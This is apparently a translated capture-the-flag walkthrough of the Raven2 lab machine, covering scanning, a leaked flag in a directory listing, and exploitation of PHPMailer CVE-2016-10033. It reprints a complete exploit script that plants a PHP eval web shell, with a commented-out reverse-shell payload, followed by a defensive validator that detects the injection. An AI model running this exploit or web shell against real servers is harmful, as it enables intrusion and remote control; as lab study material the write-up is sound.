Raven2 Target Machine

After setting up the target VM, set all network adapters to NAT mode.

Look up the host IP.

Use Nmap to scan for host IPs on the same subnet (an earlier scan of the wrong subnet, 192.168.0.0, found nothing):

nmap -sn 192.168.5.0/24


Target IP found:

http://192.168.5.144/

Scan the IP address to find open ports and related information.

Vulnerability scan with Xray.

Xray scan result:

http://192.168.5.144/.DS_Store


The afrog scan turned up the following, which suggests an RCE vulnerability is very likely present:

Index of /js


Run another Xray vulnerability scan:

xray_windows_amd64.exe webscan --basic-crawler http://192.168.5.144/ --html-output 2.html


Directory scan with Yujian (御剑):

http://192.168.5.144/manual/en/index.html
http://192.168.5.144/css/
http://192.168.5.144/img/
http://192.168.5.144/vendor/?C=S;O=A

The Index of /vendor listing reveals the version information and flag1:

5.2.16

/var/www/html/vendor/
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}

Searching with searchsploit shows that PHPMailer 5.2.18 has an RCE vulnerability.

This also matches the afrog result.

Looking up PHPMailer 5.2.18 yields its CVE number and an approach to privilege escalation.

Running the exploit script yields the shell address.

"""
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033
​
Description:
Exploiting PHPMail with back connection (reverse shell) from the target
​
Usage:
1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
4 - Open nc listener in one terminal: $ nc -lnvp <your ip>
3 - Open other terminal and run the exploit: python3 anarcoder.py
​
Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU
​
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""
​
from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh
​
os.system('clear')
print("\n")
print(" █████╗ ███╗   ██╗ █████╗ ██████╗  ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║     ██║   ██║██║  ██║█████╗  ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║     ██║   ██║██║  ██║██╔══╝  ██╔══██╗")
print("██║  ██║██║ ╚████║██║  ██║██║  ██║╚██████╗╚██████╔╝██████╔╝███████╗██║  ██║")
print("╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝")
print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")
​
# target = 'http://localhost:8080'
target = 'http://192.168.5.144/'
vuln = "/contact.php"
​
# backdoor = '/backdoor.php'
backdoor = '/shell.php'
​
# payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.0.12\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
payload = '<?php @eval($_REQUEST[777]);phpinfo();?>'
​
fields={'action': 'submit',
        'name': payload,
        # 'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @protonmail.com',
        'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/var/www/html/shell.php server\" @protonmail.com',
        'message': 'Pwned'}
​
m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')
​
# headers={'User-Agent': 'curl/7.47.0',
headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36',
​
         'Content-Type': m.content_type}
​
proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}
​
print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
​
# r = requests.post(target, data=m.to_string(),
r = requests.post(target + vuln, data=m.to_string(),
                  headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
    # print('[+]  ExPLoITeD ' + target)
    print('[+] ExPLoITeD ' + target + backdoor)

http://192.168.5.144//shell.php     // shell address
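As an added example, not part of the original post or of the exploit script above, here is the server-side check a defender would put in front of a contact form like this one: it rejects sender addresses that are not plain addresses, flags the sendmail option pattern that the script's email field relies on, and flags PHP open tags in the free-text fields. It is written in Python (the language of the script above) rather than in the form's own PHP; the sample submissions are constructed, and the second one reuses the field values the script posts.

```python
import re

# Constructed sample form submissions (hypothetical), shaped like the three
# fields the script above posts to /contact.php. The second one reuses that
# script's own field values.
SAMPLE_SUBMISSIONS = [
    {"name": "Alice", "email": "alice@example.com", "message": "Hello"},
    {"name": "<?php @eval($_REQUEST[777]);phpinfo();?>",
     "email": '"anarcoder\\" -OQueueDirectory=/tmp -X/var/www/html/shell.php server" @protonmail.com',
     "message": "Pwned"},
    {"name": "Bob", "email": "bob+news@example.org", "message": "Quote please"},
]

# A deliberately strict address shape: local part, '@', dotted domain.
# Spaces, quotes and backslashes are excluded, so a sendmail option string
# cannot ride along inside the sender address.
SAFE_ADDRESS = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")

# Whitespace (or start of string) followed by a sendmail -X (log file) or
# -O... (option) flag, the pattern used in CVE-2016-10033 style injection.
SENDMAIL_OPTION = re.compile(r"(^|\s)-(X|O\w*)")


def check_submission(sub):
    """Return the reasons a submission must be rejected (empty list = accept)."""
    reasons = []
    email = sub.get("email", "")
    if not SAFE_ADDRESS.match(email):
        reasons.append("email: not a plain address")
    if SENDMAIL_OPTION.search(email):
        reasons.append("email: sendmail option injection pattern")
    for field in ("name", "message"):
        if "<?" in sub.get(field, ""):
            reasons.append(field + ": PHP open tag in free text")
    return reasons


if __name__ == "__main__":
    for sub in SAMPLE_SUBMISSIONS:
        verdict = check_submission(sub)
        print("REJECT" if verdict else "ACCEPT", sub["email"], verdict)
```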

Connect with AntSword (蚁剑).

Reverse shell... it did not connect back...

Stopped here...
